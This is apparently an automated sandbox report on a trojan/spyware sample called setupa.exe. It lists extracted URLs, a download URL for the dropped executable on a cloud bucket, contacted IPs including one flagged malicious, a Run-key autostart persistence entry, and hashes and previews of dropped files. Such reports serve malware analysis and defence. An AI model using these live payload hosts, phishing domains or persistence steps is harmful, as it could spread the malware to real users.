                                                            http://crl.ver)svchost.exe, 00000008.00000002.3348244944.000002D753EDD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.3363402606.000001428B127000.00000004.00000001.00020000.00000000.sdmpfalse
                                                              		unknown
                                                              http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdxsvchost.exe, 00000008.00000003.2271420888.000002D754529000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		unknown
                                                                http://passport.net/tbsvchost.exe, 00000008.00000002.3348421025.000002D753EEE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		unknown
                                                                  http://upx.sf.netAmcache.hve.7.drfalse
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  https://login.microsoftonline.com/ppsecure/DeviceDisassociate.srfsvchost.exe, 00000008.00000002.3346593256.000002D753E5E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		unknown
                                                                    http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdssvchost.exe, 00000008.00000003.2342560646.000002D754574000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		unknown
                                                                      http://schemas.xmlsoap.org/ws/2004/09/policyAAAAsvchost.exe, 00000008.00000003.2286058883.000002D754574000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		unknown
                                                                        http://schemas.xmlsoap.org/ws/2005/02/trust/Issuesvchost.exe, 00000008.00000002.3346593256.000002D753E7E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3350490137.000002D75455F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2331457254.000002D75456E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        		unknown
                                                                        https://login.microsoftonline.com/ppsecure/DeviceAssociate.srfsvchost.exe, 00000008.00000003.2199678788.000002D754563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199591191.000002D75454D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		unknown
                                                                          https://account.live.com/Wizard/Password/Change?id=80601svchost.exe, 00000008.00000003.2199332280.000002D75452C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199678788.000002D754563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199441553.000002D754552000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199856552.000002D754556000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3346593256.000002D753E5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199332280.000002D754529000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		unknown
                                                                            http://schemas.xmlsoap.org/ws/2005/02/scsvchost.exe, 00000008.00000002.3350490137.000002D75455F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            		unknown
                                                                            https://account.live.com/inlinesignup.aspx?iww=1&id=80601svchost.exe, 00000008.00000003.2199678788.000002D754563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199591191.000002D75454D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3346451311.000002D753E40000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		unknown
                                                                              https://kehu8.oss-cn-hongkong.aliyuncs.com/upupoo-classicshell.exe:setupa.exe, 00000000.00000003.2158570611.000001F5DCD7C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		unknown
                                                                                http://schemas.xmlsoap.org/wsdl/soap12/lsass.exe, 00000001.00000000.2090485872.00000140AD82F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                  		unknown
                                                                                  https://account.live.com/inlinesignup.aspx?iww=1&id=80600svchost.exe, 00000008.00000003.2199678788.000002D754563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199591191.000002D75454D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3346451311.000002D753E40000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		unknown
                                                                                    http://schemas.xmlsoap.org/wsdl/lsass.exe, 00000001.00000000.2090485872.00000140AD82F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    		unknown
                                                                                    http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdAAAsvchost.exe, 00000008.00000003.2271420888.000002D754529000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		unknown
                                                                                      http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issuesvchost.exe, 00000008.00000002.3347561390.000002D753EB9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2331457254.000002D75456E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • URL Reputation: safe
                                                                                      		unknown
                                                                                      https://login.microsoftonline.com/ppsecure/DeviceUpdate.srfsvchost.exe, 00000008.00000003.2199678788.000002D754563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199591191.000002D75454D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3346593256.000002D753E5E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		unknown
                                                                                        http://Passport.NET/tb:ppsvchost.exe, 00000008.00000002.3352993743.000002D754CB0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3347254806.000002D753EA0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		unknown
                                                                                          http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdessvchost.exe, 00000008.00000003.2316259625.000002D754574000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2331530275.000002D754574000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2331457254.000002D75456E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            		unknown
                                                                                            http://schemas.xmlsoap.org/ws/2005/02/trust/Issuessuesvchost.exe, 00000008.00000003.2331457254.000002D75456E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              		unknown
                                                                                              https://login.ecursvchost.exe, 00000008.00000002.3346451311.000002D753E40000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                		unknown
                                                                                                https://kehu8.oss-cn-hongkong.aliyuncs.com/Ssetupa.exe, 00000000.00000003.2137313739.000001F5DCD7C000.00000004.00000020.00020000.00000000.sdmp, setupa.exe, 00000000.00000003.2158570611.000001F5DCD7C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  		unknown
                                                                                                  https://account.live.com/Wizard/Password/Change?id=806015svchost.exe, 00000008.00000003.2199591191.000002D75454D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    		unknown
                                                                                                    https://account.live.com/inlinesignup.aspx?iww=1&id=80605svchost.exe, 00000008.00000003.2199678788.000002D754563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3346593256.000002D753E5E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      		unknown
                                                                                                      https://account.live.com/inlinesignup.aspx?iww=1&id=80603svchost.exe, 00000008.00000003.2199678788.000002D754563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199591191.000002D75454D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3346593256.000002D753E5E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        		unknown
                                                                                                        https://account.live.com/inlinesignup.aspx?iww=1&id=80604svchost.exe, 00000008.00000003.2199678788.000002D754563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3346593256.000002D753E5E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          		unknown
                                                                                                          https://kehu8.oss-cn-hongkong.aliyuncs.com/upupoo-classicshell.exeRsetupa.exe, 00000000.00000003.2158570611.000001F5DCDAD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            		unknown
                                                                                                            http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdsvchost.exe, 00000008.00000002.3350490137.000002D75455F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2331530275.000002D754574000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2331457254.000002D75456E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2252612816.000002D75450E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2272320979.000002D754510000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2252517534.000002D75450E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3349971930.000002D754500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3352204209.000002D754C78000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            		unknown

                                                                                                            World Map of Contacted IPs

                                                                                                            • No. of IPs < 25%
                                                                                                            • 25% < No. of IPs < 50%
                                                                                                            • 50% < No. of IPs < 75%
                                                                                                            • 75% < No. of IPs

                                                                                                            Public IPs

                                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                                            47.239.116.158
                                                                                                            		unknownUnited States
                                                                                                            		20115CHARTER-20115UStrue
                                                                                                            47.79.64.157
                                                                                                            		kehu8.oss-cn-hongkong.aliyuncs.comUnited States
                                                                                                            		9500VODAFONE-TRANSIT-ASVodafoneNZLtdNZfalse

                                                                                                            General Information

                                                                                                            Joe Sandbox version:41.0.0 Charoite
                                                                                                            Analysis ID:1527612
                                                                                                            Start date and time:2024-10-07 06:38:04 +02:00
                                                                                                            Joe Sandbox product:CloudBasic
                                                                                                            Overall analysis duration:0h 9m 16s
                                                                                                            Hypervisor based Inspection enabled:false
                                                                                                            Report type:full
                                                                                                            Cookbook file name:default.jbs
                                                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                            Number of analysed new started processes analysed:14
                                                                                                            Number of new started drivers analysed:0
                                                                                                            Number of existing processes analysed:0
                                                                                                            Number of existing drivers analysed:0
                                                                                                            Number of injected processes analysed:2
                                                                                                            Technologies:
                                                                                                            • HCA enabled
                                                                                                            • EGA enabled
                                                                                                            • AMSI enabled
                                                                                                            Analysis Mode:default
                                                                                                            Analysis stop reason:Timeout
                                                                                                            Sample name:setupa.exe
                                                                                                            Detection:MAL
                                                                                                            Classification:mal100.troj.spyw.evad.winEXE@12/41@1/2
                                                                                                            EGA Information:
                                                                                                            • Successful, ratio: 100%
                                                                                                            HCA Information:
                                                                                                            • Successful, ratio: 92%
                                                                                                            • Number of executed functions: 117
                                                                                                            • Number of non-executed functions: 278
                                                                                                            Cookbook Comments:
                                                                                                            • Found application associated with file extension: .exe

                                                                                                            Warnings

                                                                                                            • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                                                                                                            • Exclude process from analysis (whitelisted): WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                                                                            • Excluded IPs from analysis (whitelisted): 20.190.159.23, 40.126.31.73, 40.126.31.69, 20.190.159.4, 40.126.31.71, 40.126.31.67, 20.190.159.71, 20.190.159.75, 93.184.221.240, 192.229.221.95, 20.42.65.92, 52.182.143.212
                                                                                                            • Excluded domains from analysis (whitelisted): prdv4a.aadg.msidentity.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, wu.ec.azureedge.net, www.tm.v4.a.prd.aadg.trafficmanager.net, ctldl.windowsupdate.com, wu.azureedge.net, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, onedsblobprdeus17.eastus.cloudapp.azure.com, ocsp.digicert.com, onedsblobprdcus15.centralus.cloudapp.azure.com, login.live.com, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, ocsp.edge.digicert.com, blobcollector.events.data.trafficmanager.net, hlb.apr-52dd2-0.edgecastdns.net, umwatson.events.data.microsoft.com, wu-b-net.trafficmanager.net, www.tm.lg.prod.aadmsa.trafficmanager.net
                                                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                            • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                            • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                            Simulations

                                                                                                            Behavior and APIs

                                                                                                            TimeTypeDescription
                                                                                                            00:39:00API Interceptor4x Sleep call for process: setupa.exe modified
                                                                                                            00:39:00API Interceptor1x Sleep call for process: dllhost.exe modified
                                                                                                            00:39:08API Interceptor4x Sleep call for process: upupoo-classicshell.exe modified
                                                                                                            00:39:14API Interceptor673840x Sleep call for process: svchost.exe modified
                                                                                                            00:39:25API Interceptor2x Sleep call for process: WerFault.exe modified
                                                                                                            00:40:18API Interceptor195x Sleep call for process: lsass.exe modified
                                                                                                            06:39:08AutostartRun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run WINWORD2013 C:\Users\Public\Documents\upupoo-classicshell.exe

                                                                                                            Joe Sandbox View / Context

                                                                                                            IPs

                                                                                                            No context

                                                                                                            Domains

                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            fp2e7a.wpc.phicdn.netcea5c9ffbf7c8ae9cf3f22399151956f3ee7145b95978.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 192.229.221.95
                                                                                                            MPil9jkBPG.exeGet hashmaliciousVidarBrowse
                                                                                                            • 192.229.221.95
                                                                                                            fe6yqly1Xh.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                            • 192.229.221.95
                                                                                                            http://ser0xen.com/sucklemydicknigger.exeGet hashmaliciousXWormBrowse
                                                                                                            • 192.229.221.95
                                                                                                            file.exeGet hashmaliciousVidarBrowse
                                                                                                            • 192.229.221.95
                                                                                                            file.exeGet hashmaliciousVidarBrowse
                                                                                                            • 192.229.221.95
                                                                                                            file.exeGet hashmaliciousStealcBrowse
                                                                                                            • 192.229.221.95
                                                                                                            CR0QGWXdDl.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                            • 192.229.221.95
                                                                                                            https://maxask.comGet hashmaliciousUnknownBrowse
                                                                                                            • 192.229.221.95
                                                                                                            SecuriteInfo.com.Trojan.DownLoader47.42925.26493.18247.exeGet hashmaliciousAmadeyBrowse
                                                                                                            • 192.229.221.95

                                                                                                            ASNs

                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            VODAFONE-TRANSIT-ASVodafoneNZLtdNZna.elfGet hashmaliciousMiraiBrowse
                                                                                                            • 210.246.40.191
                                                                                                            arm-20241006-0950.elfGet hashmaliciousMiraiBrowse
                                                                                                            • 118.95.51.137
                                                                                                            setup.ic19.exeGet hashmaliciousGhostRat, NitolBrowse
                                                                                                            • 47.76.31.57
                                                                                                            https://whtasapp-ky.com/Get hashmaliciousUnknownBrowse
                                                                                                            • 47.76.254.147
                                                                                                            file.exeGet hashmaliciousGhostRat, MimikatzBrowse
                                                                                                            • 47.76.175.95
                                                                                                            https://whsotsapp.com/Get hashmaliciousUnknownBrowse
                                                                                                            • 47.76.254.147
                                                                                                            https://alie.kr/8IuPro4Get hashmaliciousUnknownBrowse
                                                                                                            • 104.84.57.202
                                                                                                            https://www.google.com/url?q=dCSMjVnvsqsqaP8pEWWm&rct=SpPq9HncUaCXUtCZusX0&sa=t&esrc=uZR6jk9A67Rj7RZhLuPE&source=&cd=eh0xIKCKpKh7i4kTt26p&cad=VEVtMkQKVNr1KW4fxShi&ved=NTDACygNXetEDbRT8YiY&uact=%20&url=amp/zoe-elefterin.com/M%2f13303%2FcXJzYy1xdWFsaXR5cmVwb3J0aW5nc2VydmljZWNlbnRlcmdyb3VwbWFpbGJveEBycmIuZ292Get hashmaliciousHTMLPhisherBrowse
                                                                                                            • 104.84.56.104
                                                                                                            https://login-wsapp.shop/Get hashmaliciousUnknownBrowse
                                                                                                            • 47.76.213.192
                                                                                                            SecuriteInfo.com.Linux.Siggen.9999.14080.25460.elfGet hashmaliciousMiraiBrowse
                                                                                                            • 47.78.236.62
                                                                                                            CHARTER-20115USJr77pnmOup.elfGet hashmaliciousMiraiBrowse
                                                                                                            • 71.94.21.162
                                                                                                            ZEjcJZcrXc.elfGet hashmaliciousMiraiBrowse
                                                                                                            • 24.178.88.151
                                                                                                            na.elfGet hashmaliciousMiraiBrowse
                                                                                                            • 47.26.86.21
                                                                                                            na.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                            • 66.169.57.64
                                                                                                            na.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                            • 47.6.21.109
                                                                                                            na.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                            • 71.81.11.13
                                                                                                            na.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                            • 68.189.209.139
                                                                                                            na.elfGet hashmaliciousMiraiBrowse
                                                                                                            • 47.5.199.142
                                                                                                            na.elfGet hashmaliciousMiraiBrowse
                                                                                                            • 71.14.195.176
                                                                                                            na.elfGet hashmaliciousMiraiBrowse
                                                                                                            • 75.140.122.103

                                                                                                            JA3 Fingerprints

                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            a0e9f5d64349fb13191bc781f81f42e1file.exeGet hashmaliciousLummaCBrowse
                                                                                                            • 47.79.64.157
                                                                                                            p7SnjaA8NN.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Stealc, VidarBrowse
                                                                                                            • 47.79.64.157
                                                                                                            TVyKPaL2h0.exeGet hashmaliciousAmadeyBrowse
                                                                                                            • 47.79.64.157
                                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                                            • 47.79.64.157
                                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                                            • 47.79.64.157
                                                                                                            8ObkdHP9Hq.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, StealcBrowse
                                                                                                            • 47.79.64.157
                                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                                            • 47.79.64.157
                                                                                                            MSCy5UvBYg.exeGet hashmaliciousLummaC, Amadey, Stealc, VidarBrowse
                                                                                                            • 47.79.64.157
                                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                                            • 47.79.64.157
                                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                                            • 47.79.64.157

                                                                                                            Dropped Files

                                                                                                            No context

                                                                                                            Created / dropped Files

                                                                                                            C:\Program Files\ClassicStartMenuDLL.dll

                                                                                                            Download File
                                                                                                            Process:C:\Users\user\Desktop\setupa.exe
                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):243712
                                                                                                            Entropy (8bit):6.85528085491608
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3072:zKZ/ikgjBxcTw7lIdrnS5355bC6vkuphSFd/hwlJQHmD3aQSYbx7ieLrMvBhQ2xD:k/ikgjYTKH35UkphwJPEKKiKrMJhQ
                                                                                                            MD5:D48560E3661D0EAE2E67CB13044710C3
                                                                                                            SHA1:2D2C3AD41FA699C00FD10285448BC1E0E70D9E63
                                                                                                            SHA-256:F3378B866C81A82E16807EAD2126E59ECEC07F08F9750BC03F13B68B7519A966
                                                                                                            SHA-512:9B8B6ADBF5C1F75BA13B677B29CEE71D6A826985D77E91956104D262703583A3AE2FE6E835917F9EDBBB8EFE9D61F6B902A23D523C8333CA720B7C7138B69F13
                                                                                                            Malicious:false
                                                                                                            Reputation:low
                                                                                                            Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........>.g._b4._b4._b4r.4._b4r.4._b4r.4._b4...4._b4._c4G_b4X..4._b4#.a5._b4#.g5._b4#.f5._b4._b4._b44.a5._b44.f5._b44.g5._b44.b5._b44..4._b44.`5._b4Rich._b4................PE..L......f...........!......................................................................@..........................B..E....F..P...............................$4...0..8...................41.......0..@...............X............................text...)........................... ..`.rdata..j...........................@..@.data...pP...P...>...>..............@....tls.................|..............@....rsrc................~..............@..@.reloc..$4.......6..................@..B........................................................................................................................................................................................................................

                                                                                                            C:\Program Files\upup.ox

                                                                                                            Download File
                                                                                                            Process:C:\Users\user\Desktop\setupa.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):89088
                                                                                                            Entropy (8bit):7.997839675244527
                                                                                                            Encrypted:true
                                                                                                            SSDEEP:1536:Y6YS7k7T3meXF/L84dzPu3beQ09aTQVRpVADU9mMy0H7lsH9:PY4k+ei41Pw4a8VRphmVilsd
                                                                                                            MD5:0528A5A3C232862A4B0D9624B6F23D0C
                                                                                                            SHA1:45ADAD971A0DB2EA9F26A69C881557995B49A5B6
                                                                                                            SHA-256:C42036589B0B746F4A72BD0C900FB07F1C9032AA4842CD4AFC6CFC6ABBA4FB9B
                                                                                                            SHA-512:C084E7657C3498B776845E5B7BE32A976849A963B6C74CE62A7F35DF7E77DF80603881546DCB468D512464CDF71A800CF449BCFA18585B5F87E314007447649E
                                                                                                            Malicious:false
                                                                                                            Reputation:low
                                                                                                            Preview:.K.uU"...x....d.M.7.|.i_c^^.K]YM(}./........1.{QM<.x.....[.x...5..hiz.k..)p.2..q.=..?s;..'.,f.x.N..h..}....K.I....8.Q9.9X.3.zdj...G.m..B.{.._k@Z.n..dxS.Et......Iea........H.Rm/.5.....R_....GS.2.,.F.N. .....&-..".B.Z..E.G...T.\..........:.m.<f.$............\........nS.{5..Y...-.'C.pN..k..==....Nn4.@.........W...rU..b..o/...6.@ ..@$t....M#&.+5..E.....&.d..<(.....@*......}....1.K......._..-.RGj..K.+....=...N... zLa..o.3.6...ZG.....`A.}.,.lrbA..D#>.%...n.2...A..;.j..F..B\.E...0.......8.........o..,..9X.R....$.G.....S r.-..?..e.`+ZI.@D.e.3p..n..!...Y.,.-?v.c......a.I..|@..6).$9N..(.f..jEFM..A.......Z.B....L1O..K..I..X....7..Q....$%/..o....t.vN....j....21...6.2L...>....9...0..@...Ns......(.N...o(..:.......,..t....o./Z..q.d."..{..XI..~...U.(.'.f.../W....h.....E.G.X-.(:HyL.J./e.n....!d..z...Y..1...k.{Ph..>../.y..2"...):5......b.I2.o.H,q."s.+.+...{wf_.B...2..y....G.Lg.U.5.j....Hm....\.).,H.F..OQ..D0.....L..(8..O.[.'.)....(..eaX<.]...w..E.4.....

                                                                                                            C:\Program Files\upupoo-classicshell.exe

                                                                                                            Download File
                                                                                                            Process:C:\Users\user\Desktop\setupa.exe
                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):198920
                                                                                                            Entropy (8bit):6.459024129905556
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:6144:3ADL8CQJ+ZhpTjqENRRRRRRRRRRRRRRRRRRRRRRRRRRRRKYRRRRRRRRRRRRRRRR6:3ADoC0+Z3VNRRRRRRRRRRRRRRRRRRRRg
                                                                                                            MD5:606CDA46E88CE86AE85AC92B2B560D0A
                                                                                                            SHA1:0BBBEB360175BD6033E8DBB0E1571D4595ED38DD
                                                                                                            SHA-256:99AC89D65B0CFC28D64652717EDF4B66E5DDE4741379EEB2F4F9A187801EA50E
                                                                                                            SHA-512:CBF457D793757676A7C1D5B364AE194D4B8433D9F36E82496B8EE8A92B1498A16A1E25BDB3C86DE6692F2B9E397E5B59ABA0DAA5E2EB90371E20C4D751B5037C
                                                                                                            Malicious:true
                                                                                                            Antivirus:
                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                            Reputation:low
                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............................g...........<.....................Rich...........................PE..L...`..b.............................X.......0....@.................................P(....@.................................$h...........................A...........3...............................Z..@............0...............................text............................... ..`.rdata...H...0...J... ..............@..@.data...8=....... ...j..............@....rsrc...............................@..@.reloc...#.......$..................@..B................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_upupoo-classicsh_34f49f4a7b9ee2acd1cde922863852f5cb62cfbf_33dbecd2_6c53450a-fcb1-414d-a289-a7a40738661c\Report.wer

                                                                                                            Download File
                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):65536
                                                                                                            Entropy (8bit):0.7822294246293886
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:96:i5FEw+sqhtoI7Rh6tQXIDcQvc6QcEVcw3cE/n+HbHgnoW6HeonsFERSAEj6TpOyz:Kiw+D0BU/gj4zzuiFJZ24IO8mk
                                                                                                            MD5:A4E8A6C9F4AEDD68E1E1826D070BD545
                                                                                                            SHA1:A21837DE5B883CC780677FF7F6790D355FDF3B0B
                                                                                                            SHA-256:6FDFF9E31992F0B6E6DED98517329CBC54EC01317CB8F8B257048D0EF7E6590F
                                                                                                            SHA-512:165119186CC1801524DDAFC25E22F499A0EE9479FC677C4560EFF6AE720A79F85DDE352A6AED199687B3A28D24FA9387F13605AAD653F26BAC997DF60B82947F
                                                                                                            Malicious:false
                                                                                                            Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.2.7.4.9.5.5.0.1.2.1.8.5.0.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.2.7.4.9.5.5.1.3.0.9.3.5.4.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.c.5.3.4.5.0.a.-.f.c.b.1.-.4.1.4.d.-.a.2.8.9.-.a.7.a.4.0.7.3.8.6.6.1.c.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.4.d.d.d.b.c.e.-.5.7.1.5.-.4.6.0.2.-.8.6.6.e.-.1.6.0.b.1.3.9.1.2.c.0.4.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.u.p.u.p.o.o.-.c.l.a.s.s.i.c.s.h.e.l.l...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.6.4.0.-.0.0.0.1.-.0.0.1.4.-.e.b.b.1.-.c.6.d.8.7.2.1.8.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.u.p.u.p.o.o.-.c.l.a.s.s.i.c.s.h.e.l.l...e.

                                                                                                            C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_upupoo-classicsh_75ad37d4a901ca4812289e57f3acf57cebb3ee_0f93096a_cd6b4df3-f764-45f8-aa6f-195fec183da8\Report.wer

                                                                                                            Download File
                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):65536
                                                                                                            Entropy (8bit):0.7917649946837094
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:96:RvvFque6CwTZsqHtoI7Rh6tQXIDcQvc6QcEVcw3cE/R5P+HbHgnoW6HeonsFERSI:R3ZzCwTZF0BU/gj2/zuiFJZ24IO89
                                                                                                            MD5:EC44398075ACDBEA686603328EA25F09
                                                                                                            SHA1:35E8B4AFC88887C37832A19154BB2E9FC7EB0DDE
                                                                                                            SHA-256:772650D4DE093F8393FA0054CC5D75BAEB8B436FDDB3C294120B30279F187660
                                                                                                            SHA-512:03CC0ED63F3D9DECD62A18A90F0E4B91677506D9C356374B972753E81562244990D4199000F60B4824ED1D1D3FD9118667E46CB2238F51935ACD4681C139B516
                                                                                                            Malicious:false
